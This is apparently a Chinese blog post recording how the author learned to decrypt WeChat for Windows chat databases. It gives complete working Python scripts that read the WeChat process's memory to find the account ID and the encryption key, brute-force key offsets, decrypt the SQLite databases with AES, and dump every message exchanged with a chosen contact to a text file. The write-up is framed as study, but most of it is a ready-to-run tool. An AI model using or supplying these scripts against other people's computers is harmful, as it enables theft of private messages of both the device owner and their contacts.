0x01 前言
学习下微信 数据库解密备份操作,之前是一直知道这东西能做,也测过几个github上的开源工具,但是没有具体了解怎么找key和微信的数据库加密方式以及结构;于是找了些资料看了下,学习了下;记录的学习过程如下。
0x02 学习过程
要想解密,需要拿到的key和数据库文件;
拿数据库文件,需要wxid;
所以核心就是从进程中拿到的wxid、key、数据库文件路径;
一、拿wxid:
1、通过微信进程里面出现的db文件路径,拿到微信id,微信把被加密的db文件都存在形如如下格式的路径中C:\Users\username\Documents\WeChat Files\微信id\Msg
,其中Multi里面MSGx.db一般都是记录发送的信息;
我们可以利用这个来获取当前windows机器上登录微信的id;
检索语句:Msg\Multi\MSG
即可,如下图:
二、 拿key
1、通过结构体,找到参照拿key
在wechat.exe主程序里面的WeChatWin.dll模块里面,通过”iphone、android、ipad”找到登录后的结构体,结构体中这些字符和key的相对偏移是固定的;且存在一定的对齐关系(这里是比较有说法的,前人总结出来比较好用的动态获取key的方法,不会被微信版本限制,感觉不靠谱,但是其实测试下来还是比较靠谱的);
拿到的key:
三、拿数据库文件
利用第一步获取的wxid,通过简单拼接,我们可以拿到聊天文件的数据库:
C:\Users\username\Documents\WeChat Files\微信id\Msg
这里拿一个聊天记录数据库举例:
C:\Users\username\Documents\WeChat Files\微信id\Msg\Multi\MSG0.db
四、解密
这里我们拿到的数据库文件 .db
结尾,都是sqlite的数据文件,微信对该文件的加密原理如下:
微信加密后的sqlite数据库文件,以4096字节为大小分页;每一页的结构是:加密后的内容+尾结构内容(IV+空字节),第一页稍有不同,第一页会多存一个”校验密钥“和一个salt(盐),用来校验解密的key(其实就是加密的key,加密算法是的aes对称加密算法),通过key+salt(盐) 使用PBKDF2 (这个东西简单理解就是一个hmac,只不过是迭代了指定的次数,微信这里是迭代了64000次)方法计算出来一个密钥,拿这个计算出来的密钥和第一页中的“校验密钥”对比,如果相同,就说明我们拿到的key没有问题,可以用来解aes;
具体结构如下图(该图来自参考文章)
注意
在拿key那步,里面提到的”iphone、android、ipad”提到的那些字符存在一堆误报,其他地方也出现了,所以需要爆破;随便找个db文件,拿里面”校验key“,用来测找的key对不对就行;
两个小细节:
1、爆破的时候,往前指定范围缩小的时候可以通过8字节8字节的往前(偏移的规律和计算机的位数有关,x86可以8字节,x64可以16字节);
2、这些字符出现的地址,从大地址到小地址爆,因为那个结构体基本在wechatwin.dll的最后面了;
代码:
getkey:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
import hmac
import hashlib
import ctypes
import os
import winreg
import pymem
import psutil
import sys
ReadProcessMemory = ctypes.windll.kernel32.ReadProcessMemory
void_p = ctypes.c_void_p
my_count = 0
# 获取exe文件的位数
def get_exe_bit(file_path):
"""
获取 PE 文件的位数: 32 位或 64 位
:param file_path: PE 文件路径(可执行文件)
:return: 如果遇到错误则返回 64
"""
try:
with open(file_path, 'rb') as f:
dos_header = f.read(2)
if dos_header != b'MZ':
print('get exe bit error: Invalid PE file')
return 64
# Seek to the offset of the PE signature
f.seek(60)
pe_offset_bytes = f.read(4)
pe_offset = int.from_bytes(pe_offset_bytes, byteorder='little')
# Seek to the Machine field in the PE header
f.seek(pe_offset + 4)
machine_bytes = f.read(2)
machine = int.from_bytes(machine_bytes, byteorder='little')
if machine == 0x14c:
return 32
elif machine == 0x8664:
return 64
else:
print('get exe bit error: Unknown architecture: %s' % hex(machine))
return 64
except IOError:
print('get exe bit error: File not found or cannot be opened')
return 64
def pattern_scan_all(handle, pattern, *, return_multiple=False, find_num=100):
next_region = 0
found = []
user_space_limit = 0x7FFFFFFF0000 if sys.maxsize > 2 ** 32 else 0x7fff0000
while next_region < user_space_limit:
try:
next_region, page_found = pymem.pattern.scan_pattern_page(
handle,
next_region,
pattern,
return_multiple=return_multiple
)
except Exception as e:
print(e)
break
if not return_multiple and page_found:
return page_found
if page_found:
found += page_found
if len(found) > find_num:
break
return found
def get_info_wxid(h_process):
find_num = 100
addrs = pattern_scan_all(h_process, br'\\Msg\\FTSContact', return_multiple=True, find_num=find_num)
wxids = []
for addr in addrs:
array = ctypes.create_string_buffer(80)
if ReadProcessMemory(h_process, void_p(addr - 30), array, 80, 0) == 0: return "None"
array = bytes(array) # .split(b"\\")[0]
array = array.split(b"\\Msg")[0]
array = array.split(b"\\")[-1]
wxids.append(array.decode('utf-8', errors='ignore'))
wxid = max(wxids, key=wxids.count) if wxids else "None"
return wxid
def get_info_filePath_base_wxid(h_process, wxid=""):
find_num = 10
addrs = pattern_scan_all(h_process, wxid.encode() + br'\\Msg\\FTSContact', return_multiple=True, find_num=find_num)
filePath = []
for addr in addrs:
win_addr_len = 260
array = ctypes.create_string_buffer(win_addr_len)
if ReadProcessMemory(h_process, void_p(addr - win_addr_len + 50), array, win_addr_len, 0) == 0: return "None"
array = bytes(array).split(b"\\Msg")[0]
array = array.split(b"\00")[-1]
filePath.append(array.decode('utf-8', errors='ignore'))
filePath = max(filePath, key=filePath.count) if filePath else "None"
return filePath
def get_info_filePath(wxid="all"):
if not wxid:
return "None"
w_dir = "MyDocument:"
is_w_dir = False
try:
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Tencent\WeChat", 0, winreg.KEY_READ)
value, _ = winreg.QueryValueEx(key, "FileSavePath")
winreg.CloseKey(key)
w_dir = value
is_w_dir = True
except Exception as e:
w_dir = "MyDocument:"
if not is_w_dir:
try:
user_profile = os.environ.get("USERPROFILE")
path_3ebffe94 = os.path.join(user_profile, "AppData", "Roaming", "Tencent", "WeChat", "All Users", "config",
"3ebffe94.ini")
with open(path_3ebffe94, "r", encoding="utf-8") as f:
w_dir = f.read()
is_w_dir = True
except Exception as e:
w_dir = "MyDocument:"
if w_dir == "MyDocument:":
try:
# 打开注册表路径
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders")
documents_path = winreg.QueryValueEx(key, "Personal")[0] # 读取文档实际目录路径
winreg.CloseKey(key) # 关闭注册表
documents_paths = os.path.split(documents_path)
if "%" in documents_paths[0]:
w_dir = os.environ.get(documents_paths[0].replace("%", ""))
w_dir = os.path.join(w_dir, os.path.join(*documents_paths[1:]))
# print(1, w_dir)
else:
w_dir = documents_path
except Exception as e:
profile = os.environ.get("USERPROFILE")
w_dir = os.path.join(profile, "Documents")
msg_dir = os.path.join(w_dir, "WeChat Files")
if wxid == "all" and os.path.exists(msg_dir):
return msg_dir
filePath = os.path.join(msg_dir, wxid)
return filePath if os.path.exists(filePath) else "None"
def get_key(pid, db_path, addr_len):
def read_key_bytes(h_process, address, address_len=8):
array = ctypes.create_string_buffer(address_len)
if ReadProcessMemory(h_process, void_p(address), array, address_len, 0) == 0: return "None"
address = int.from_bytes(array, byteorder='little') # 逆序转换为int地址(key地址)
key = ctypes.create_string_buffer(32)
if ReadProcessMemory(h_process, void_p(address), key, 32, 0) == 0: return "None"
key_bytes = bytes(key)
return key_bytes
def verify_key(key, wx_db_path):
KEY_SIZE = 32
DEFAULT_PAGESIZE = 4096
DEFAULT_ITER = 64000
with open(wx_db_path, "rb") as file:
blist = file.read(5000)
salt = blist[:16]
byteKey = hashlib.pbkdf2_hmac("sha1", key, salt, DEFAULT_ITER, KEY_SIZE)
first = blist[16:DEFAULT_PAGESIZE]
mac_salt = bytes([(salt[i] ^ 58) for i in range(16)])
mac_key = hashlib.pbkdf2_hmac("sha1", byteKey, mac_salt, 2, KEY_SIZE)
hash_mac = hmac.new(mac_key, first[:-32], hashlib.sha1)
hash_mac.update(b'\x01\x00\x00\x00')
global my_count
my_count +=1
print("第:{}次\n".format(my_count))
if hash_mac.digest() != first[-32:-12]:
return False
return True
phone_type1 = "iphone\x00"
phone_type2 = "android\x00"
phone_type3 = "ipad\x00"
pm = pymem.Pymem(pid)
module_name = "WeChatWin.dll"
MicroMsg_path = os.path.join(db_path, "MSG", "MicroMsg.db")
type1_addrs = pm.pattern_scan_module(phone_type1.encode(), module_name, return_multiple=True)
type2_addrs = pm.pattern_scan_module(phone_type2.encode(), module_name, return_multiple=True)
type3_addrs = pm.pattern_scan_module(phone_type3.encode(), module_name, return_multiple=True)
# print(type1_addrs, type2_addrs, type3_addrs)
type_addrs = []
if len(type1_addrs) >= 2: type_addrs += type1_addrs
if len(type2_addrs) >= 2: type_addrs += type2_addrs
if len(type3_addrs) >= 2: type_addrs += type3_addrs
if len(type_addrs) == 0: return "None"
type_addrs.sort() # 从小到大排序
for i in type_addrs[::-1]:
for j in range(i, i - 2000, -addr_len):
key_bytes = read_key_bytes(pm.process_handle, j, addr_len)
if key_bytes == "None":
continue
if verify_key(key_bytes, MicroMsg_path):
return key_bytes.hex()
return "None"
# 读取微信信息(account,mobile,name,mail,wxid,key)
def read_info(is_logging=False, is_save=False):
wechat_process = []
result = []
for process in psutil.process_iter(['name', 'exe', 'pid', 'cmdline']):
if process.name() == 'WeChat.exe':
wechat_process.append(process)
if len(wechat_process) == 0:
error = "[-] WeChat No Run"
if is_logging: print(error)
return error
for process in wechat_process:
tmp_rd = {}
tmp_rd['pid'] = process.pid
# tmp_rd['version'] = Dispatch("Scripting.FileSystemObject").GetFileVersion(process.exe())
Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, process.pid)
addrLen = get_exe_bit(process.exe()) // 8
tmp_rd['wxid'] = get_info_wxid(Handle)
tmp_rd['filePath'] = get_info_filePath_base_wxid(Handle, tmp_rd['wxid']) if tmp_rd['wxid'] != "None" else "None"
tmp_rd['filePath'] = get_info_filePath(tmp_rd['wxid']) if tmp_rd['wxid'] != "None" and tmp_rd[
'filePath'] == "None" else tmp_rd['filePath']
tmp_rd['key'] = get_key(tmp_rd['pid'], tmp_rd['filePath'], addrLen) if tmp_rd['filePath'] != "None" else "None"
result.append(tmp_rd)
if is_logging:
print("=" * 32)
if isinstance(result, str): # 输出报错
print(result)
else: # 输出结果
for i, rlt in enumerate(result):
for k, v in rlt.items():
print(f"[+] {k:>8}: {v}")
print(end="-" * 32 + "\n" if i != len(result) - 1 else "")
print("=" * 32)
if is_save:
with open("wx_info.txt", "w", encoding="utf-8") as f:
f.write(str(result))
return result
if __name__ == '__main__':
a = read_info(is_logging=True, is_save=True)
creakdb:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import hmac
import ctypes
import hashlib
import argparse
from Crypto.Cipher import AES
def decrypt_msg(path, password):
KEY_SIZE = 32
DEFAULT_ITER = 64000
DEFAULT_PAGESIZE = 4096 # 4048数据 + 16IV + 20 HMAC + 12
SQLITE_FILE_HEADER = bytes("SQLite format 3", encoding="ASCII") + bytes(1) # SQLite 文件头
with open(path, "rb") as f:
# TODO: 优化,考虑超大文件
blist = f.read()
salt = blist[:16] # 前16字节为盐
key = hashlib.pbkdf2_hmac("sha1", password, salt, DEFAULT_ITER, KEY_SIZE) # 获得Key
page1 = blist[16:DEFAULT_PAGESIZE] # 丢掉salt
mac_salt = bytes([x ^ 0x3a for x in salt])
mac_key = hashlib.pbkdf2_hmac("sha1", key, mac_salt, 2, KEY_SIZE)
hash_mac = hmac.new(mac_key, digestmod="sha1")
hash_mac.update(page1[:-32])
hash_mac.update(bytes(ctypes.c_int(1)))
if hash_mac.digest() != page1[-32:-12]:
raise RuntimeError("密码错误!")
pages = [blist[i:i+DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]
pages.insert(0, page1) # 把第一页补上
with open(f"{path}.dec.db", "wb") as f:
f.write(SQLITE_FILE_HEADER) # 写入文件头
for i in pages:
t = AES.new(key, AES.MODE_CBC, i[-48:-32])
f.write(t.decrypt(i[:-48]))
f.write(i[-48:])
if __name__ == "__main__":
parse = argparse.ArgumentParser()
parse.add_argument("-p", "--path", type=str, required=True, help="待解密数据库路径")
parse.add_argument("-k", "--key", type=str, required=True, help="获取的key")
args = parse.parse_args()
key = bytes.fromhex(args.key)
path = args.path
decrypt_msg(path, key)
0x03 获取指定联系人聊天记录
mcromsg.db 里面的 Contact表,拿到wxid和 微信号 和昵称的映射关系;
从\Msg\Multi
里面的msgx.db的MSG表,拿到全部聊天记录内容,其中strTalker字段是wxid;
0x04 效果
实现指定昵称的微笑聊天记录一键获取;
效果,如下图,一键获取指定昵称好友的聊天记录:
聊天记录存储:
代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
import argparse
import os
import shutil
import winreg
import pymem
import psutil
import sys
import hmac
import ctypes
import hashlib
from Crypto.Cipher import AES
import sqlite3
ReadProcessMemory = ctypes.windll.kernel32.ReadProcessMemory
void_p = ctypes.c_void_p
my_count = 0
# 获取exe文件的位数
def get_exe_bit(file_path):
"""
获取 PE 文件的位数: 32 位或 64 位
:param file_path: PE 文件路径(可执行文件)
:return: 如果遇到错误则返回 64
"""
try:
with open(file_path, 'rb') as f:
dos_header = f.read(2)
if dos_header != b'MZ':
print('get exe bit error: Invalid PE file')
return 64
# Seek to the offset of the PE signature
f.seek(60)
pe_offset_bytes = f.read(4)
pe_offset = int.from_bytes(pe_offset_bytes, byteorder='little')
# Seek to the Machine field in the PE header
f.seek(pe_offset + 4)
machine_bytes = f.read(2)
machine = int.from_bytes(machine_bytes, byteorder='little')
if machine == 0x14c:
return 32
elif machine == 0x8664:
return 64
else:
print('get exe bit error: Unknown architecture: %s' % hex(machine))
return 64
except IOError:
print('get exe bit error: File not found or cannot be opened')
return 64
def pattern_scan_all(handle, pattern, *, return_multiple=False, find_num=100):
next_region = 0
found = []
user_space_limit = 0x7FFFFFFF0000 if sys.maxsize > 2 ** 32 else 0x7fff0000
while next_region < user_space_limit:
try:
next_region, page_found = pymem.pattern.scan_pattern_page(
handle,
next_region,
pattern,
return_multiple=return_multiple
)
except Exception as e:
print(e)
break
if not return_multiple and page_found:
return page_found
if page_found:
found += page_found
if len(found) > find_num:
break
return found
def get_info_wxid(h_process):
find_num = 100
addrs = pattern_scan_all(h_process, br'\\Msg\\FTSContact', return_multiple=True, find_num=find_num)
wxids = []
for addr in addrs:
array = ctypes.create_string_buffer(80)
if ReadProcessMemory(h_process, void_p(addr - 30), array, 80, 0) == 0: return "None"
array = bytes(array) # .split(b"\\")[0]
array = array.split(b"\\Msg")[0]
array = array.split(b"\\")[-1]
wxids.append(array.decode('utf-8', errors='ignore'))
wxid = max(wxids, key=wxids.count) if wxids else "None"
return wxid
def get_info_filePath_base_wxid(h_process, wxid=""):
find_num = 10
addrs = pattern_scan_all(h_process, wxid.encode() + br'\\Msg\\FTSContact', return_multiple=True, find_num=find_num)
filePath = []
for addr in addrs:
win_addr_len = 260
array = ctypes.create_string_buffer(win_addr_len)
if ReadProcessMemory(h_process, void_p(addr - win_addr_len + 50), array, win_addr_len, 0) == 0: return "None"
array = bytes(array).split(b"\\Msg")[0]
array = array.split(b"\00")[-1]
filePath.append(array.decode('utf-8', errors='ignore'))
filePath = max(filePath, key=filePath.count) if filePath else "None"
return filePath
def get_info_filePath(wxid="all"):
if not wxid:
return "None"
w_dir = "MyDocument:"
is_w_dir = False
try:
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Tencent\WeChat", 0, winreg.KEY_READ)
value, _ = winreg.QueryValueEx(key, "FileSavePath")
winreg.CloseKey(key)
w_dir = value
is_w_dir = True
except Exception as e:
w_dir = "MyDocument:"
if not is_w_dir:
try:
user_profile = os.environ.get("USERPROFILE")
path_3ebffe94 = os.path.join(user_profile, "AppData", "Roaming", "Tencent", "WeChat", "All Users", "config",
"3ebffe94.ini")
with open(path_3ebffe94, "r", encoding="utf-8") as f:
w_dir = f.read()
is_w_dir = True
except Exception as e:
w_dir = "MyDocument:"
if w_dir == "MyDocument:":
try:
# 打开注册表路径
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders")
documents_path = winreg.QueryValueEx(key, "Personal")[0] # 读取文档实际目录路径
winreg.CloseKey(key) # 关闭注册表
documents_paths = os.path.split(documents_path)
if "%" in documents_paths[0]:
w_dir = os.environ.get(documents_paths[0].replace("%", ""))
w_dir = os.path.join(w_dir, os.path.join(*documents_paths[1:]))
# print(1, w_dir)
else:
w_dir = documents_path
except Exception as e:
profile = os.environ.get("USERPROFILE")
w_dir = os.path.join(profile, "Documents")
msg_dir = os.path.join(w_dir, "WeChat Files")
if wxid == "all" and os.path.exists(msg_dir):
return msg_dir
filePath = os.path.join(msg_dir, wxid)
return filePath if os.path.exists(filePath) else "None"
def get_key(pid, db_path, addr_len):
def read_key_bytes(h_process, address, address_len=8):
array = ctypes.create_string_buffer(address_len)
if ReadProcessMemory(h_process, void_p(address), array, address_len, 0) == 0: return "None"
address = int.from_bytes(array, byteorder='little') # 逆序转换为int地址(key地址)
key = ctypes.create_string_buffer(32)
if ReadProcessMemory(h_process, void_p(address), key, 32, 0) == 0: return "None"
key_bytes = bytes(key)
return key_bytes
def verify_key(key, wx_db_path):
KEY_SIZE = 32
DEFAULT_PAGESIZE = 4096
DEFAULT_ITER = 64000
with open(wx_db_path, "rb") as file:
blist = file.read(5000)
salt = blist[:16]
byteKey = hashlib.pbkdf2_hmac("sha1", key, salt, DEFAULT_ITER, KEY_SIZE)
first = blist[16:DEFAULT_PAGESIZE]
mac_salt = bytes([(salt[i] ^ 58) for i in range(16)])
mac_key = hashlib.pbkdf2_hmac("sha1", byteKey, mac_salt, 2, KEY_SIZE)
hash_mac = hmac.new(mac_key, first[:-32], hashlib.sha1)
hash_mac.update(b'\x01\x00\x00\x00')
# global my_count
# my_count +=1
# print("第:{}次\n".format(my_count))
if hash_mac.digest() != first[-32:-12]:
return False
return True
phone_type1 = "iphone\x00"
phone_type2 = "android\x00"
phone_type3 = "ipad\x00"
pm = pymem.Pymem(pid)
module_name = "WeChatWin.dll"
MicroMsg_path = os.path.join(db_path, "MSG", "MicroMsg.db")
type1_addrs = pm.pattern_scan_module(phone_type1.encode(), module_name, return_multiple=True)
type2_addrs = pm.pattern_scan_module(phone_type2.encode(), module_name, return_multiple=True)
type3_addrs = pm.pattern_scan_module(phone_type3.encode(), module_name, return_multiple=True)
# print(type1_addrs, type2_addrs, type3_addrs)
type_addrs = []
if len(type1_addrs) >= 2: type_addrs += type1_addrs
if len(type2_addrs) >= 2: type_addrs += type2_addrs
if len(type3_addrs) >= 2: type_addrs += type3_addrs
if len(type_addrs) == 0: return "None"
type_addrs.sort() # 从小到大排序
for i in type_addrs[::-1]:
for j in range(i, i - 2000, -addr_len):
key_bytes = read_key_bytes(pm.process_handle, j, addr_len)
if key_bytes == "None":
continue
if verify_key(key_bytes, MicroMsg_path):
return key_bytes.hex()
return "None"
# 读取微信信息(account,mobile,name,mail,wxid,key)
def read_info(is_logging=False, is_save=False):
wechat_process = []
result = []
for process in psutil.process_iter(['name', 'exe', 'pid', 'cmdline']):
if process.name() == 'WeChat.exe':
wechat_process.append(process)
if len(wechat_process) == 0:
error = "[-] WeChat No Run"
if is_logging: print(error)
return error
for process in wechat_process:
tmp_rd = {}
tmp_rd['pid'] = process.pid
# tmp_rd['version'] = Dispatch("Scripting.FileSystemObject").GetFileVersion(process.exe())
Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, process.pid)
addrLen = get_exe_bit(process.exe()) // 8
tmp_rd['wxid'] = get_info_wxid(Handle)
tmp_rd['filePath'] = get_info_filePath_base_wxid(Handle, tmp_rd['wxid']) if tmp_rd['wxid'] != "None" else "None"
tmp_rd['filePath'] = get_info_filePath(tmp_rd['wxid']) if tmp_rd['wxid'] != "None" and tmp_rd[
'filePath'] == "None" else tmp_rd['filePath']
tmp_rd['key'] = get_key(tmp_rd['pid'], tmp_rd['filePath'], addrLen) if tmp_rd['filePath'] != "None" else "None"
# result.append(tmp_rd)
# if is_logging:
# print("=" * 32)
# if isinstance(result, str): # 输出报错
# print(result)
# else: # 输出结果
# for i, rlt in enumerate(result):
# for k, v in rlt.items():
# print(f"[+] {k:>8}: {v}")
# print(end="-" * 32 + "\n" if i != len(result) - 1 else "")
# print("=" * 32)
#
# if is_save:
# with open("wx_info.txt", "w", encoding="utf-8") as f:
# f.write(str(result))
return tmp_rd
def decrypt_db(path, password):
KEY_SIZE = 32
DEFAULT_ITER = 64000
DEFAULT_PAGESIZE = 4096 # 4048数据 + 16IV + 20 HMAC + 12
SQLITE_FILE_HEADER = bytes("SQLite format 3", encoding="ASCII") + bytes(1) # SQLite 文件头
with open(path, "rb") as f:
# TODO: 优化,考虑超大文件
blist = f.read()
salt = blist[:16] # 前16字节为盐
key = hashlib.pbkdf2_hmac("sha1", password, salt, DEFAULT_ITER, KEY_SIZE) # 获得Key
page1 = blist[16:DEFAULT_PAGESIZE] # 丢掉salt
mac_salt = bytes([x ^ 0x3a for x in salt])
mac_key = hashlib.pbkdf2_hmac("sha1", key, mac_salt, 2, KEY_SIZE)
hash_mac = hmac.new(mac_key, digestmod="sha1")
hash_mac.update(page1[:-32])
hash_mac.update(bytes(ctypes.c_int(1)))
if hash_mac.digest() != page1[-32:-12]:
raise RuntimeError("密码错误!")
pages = [blist[i:i+DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]
pages.insert(0, page1) # 把第一页补上
with open(f"{path}.dec.db", "wb") as f:
f.write(SQLITE_FILE_HEADER) # 写入文件头
for i in pages:
t = AES.new(key, AES.MODE_CBC, i[-48:-32])
f.write(t.decrypt(i[:-48]))
f.write(i[-48:])
def query_database(db_path, query):
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
try:
cursor.execute(query)
rows = cursor.fetchall()
# for row in rows:
# print(row)
except sqlite3.Error as e:
print(f"An error occurred: {e}")
finally:
conn.close()
return rows
def resolvemsg(msg_list,nickname):
print("消息for: {} ---------------------".format(nickname))
with open(f"{nickname}.txt", "w") as f:
for t in msg_list:
if(t[0]==1):
print("发送:{}".format(t[1]))
f.write("发送:{}\n".format(t[1]))
else:
print("接收:{}".format(t[1]))
f.write("接收:{}\n".format(t[1]))
print("消息:---------------------")
def getmsg(nickname,db_contact_path,db_msg_path):
query_getwxidbynick = "SELECT UserName FROM Contact WHERE NickName=='{}';".format(nickname)
wxid_list = query_database(db_contact_path, query_getwxidbynick)
if len(wxid_list)==0:
return 2 # nike不存在
wxid = wxid_list[0][0]
query_getmsgbywxid = "SELECT IsSender,StrContent FROM MSG WHERE StrTalker=='{}';".format(wxid)
msg_list = query_database(db_msg_path, query_getmsgbywxid)
if len(msg_list)==0:
return 3 # 没有聊天记录
resolvemsg(msg_list,nickname)
return 1 # 正常
def mycopy(src_path):
# 获取当前脚本执行的目录
current_directory = os.path.dirname(os.path.abspath(__file__))
file_name = os.path.basename(src_path)
dest_path = os.path.join(current_directory, file_name)
try:
# 复制文件到当前目录
shutil.copy(src_path, dest_path)
return dest_path
except FileNotFoundError:
print(f"Error: File '{src_path}' not found.")
except PermissionError:
print("Error: Permission denied.")
except Exception as e:
print(f"An error occurred: {e}")
def getnickname(db_contact_path):
query_getalllnick = "SELECT NickName FROM Contact;"
nicknames_list = query_database(db_contact_path, query_getalllnick)
if len(nicknames_list)==0:
return [2] # 没有nickname
else:
return nicknames_list
def coutnickname(nicknames):
print("Contact Nickname:----------------------")
i=1
for t in nicknames:
print("{} : {}".format(i,t[0]))
i+=1
print("Contact Nickname:----------------------")
def run(nickname,isonlygetmsg):
if not isonlygetmsg:
#getkey
info = read_info(is_logging=True, is_save=True)
key = bytes.fromhex(info['key'])
basefilepath =info['filePath']
# #creakdb not copy db
# db_contact_path = basefilepath+'/msg/micromsg.db' # contactdb
# db_msg_path = basefilepath+'/msg/multi/msg0.db' # msgdb
# decrypt_msg(db_contact_path, key)
# decrypt_msg(db_msg_path, key)
#creakdb: copy db
db_contact_path = basefilepath+'/msg/micromsg.db' # contactdb
db_msg_path = basefilepath+'/msg/multi/msg0.db' # msgdb
mydb_contact = mycopy(db_contact_path)
mydb_msg = mycopy(db_msg_path)
decrypt_db(mydb_contact, key)
decrypt_db(mydb_msg, key)
else:
current_directory = os.path.dirname(os.path.abspath(__file__))
mydb_contact =os.path.join(current_directory,"micromsg.db")
mydb_msg =os.path.join(current_directory,"msg0.db")
#getmsg
is_first_time = True
mynicknames=[] #所有昵称
mynicknames = getnickname(mydb_contact+".dec.db")
if mynicknames[0]==2:
print("contact table no nickname!!!!!!!!")
return
while True:
if not is_first_time:
coutnickname(mynicknames)
nickname = input("Enter the nickname that needs to be queried (or type 'exit' to quit): ")
if nickname.lower() == 'exit':
break
res = getmsg(nickname, mydb_contact+".dec.db", mydb_msg + ".dec.db")
if(res == 2):
print("no this nickname:{}".format(nickname))
pass
elif(res==3):
print("no msg for this nickname:{}".format(nickname))
pass
is_first_time = False
if __name__ == '__main__':
parse = argparse.ArgumentParser()
parse.add_argument("-n", "--nickname", type=str, required=True, help="nikcname that need to be query")
parse.add_argument("-g","--getmsgfromdecdb",action="store_true",help="only get date form dec db")
args = parse.parse_args()
nickname = args.nickname
isonlygetmsg = False
if args.getmsgfromdecdb:
isonlygetmsg = True
run(nickname,isonlygetmsg)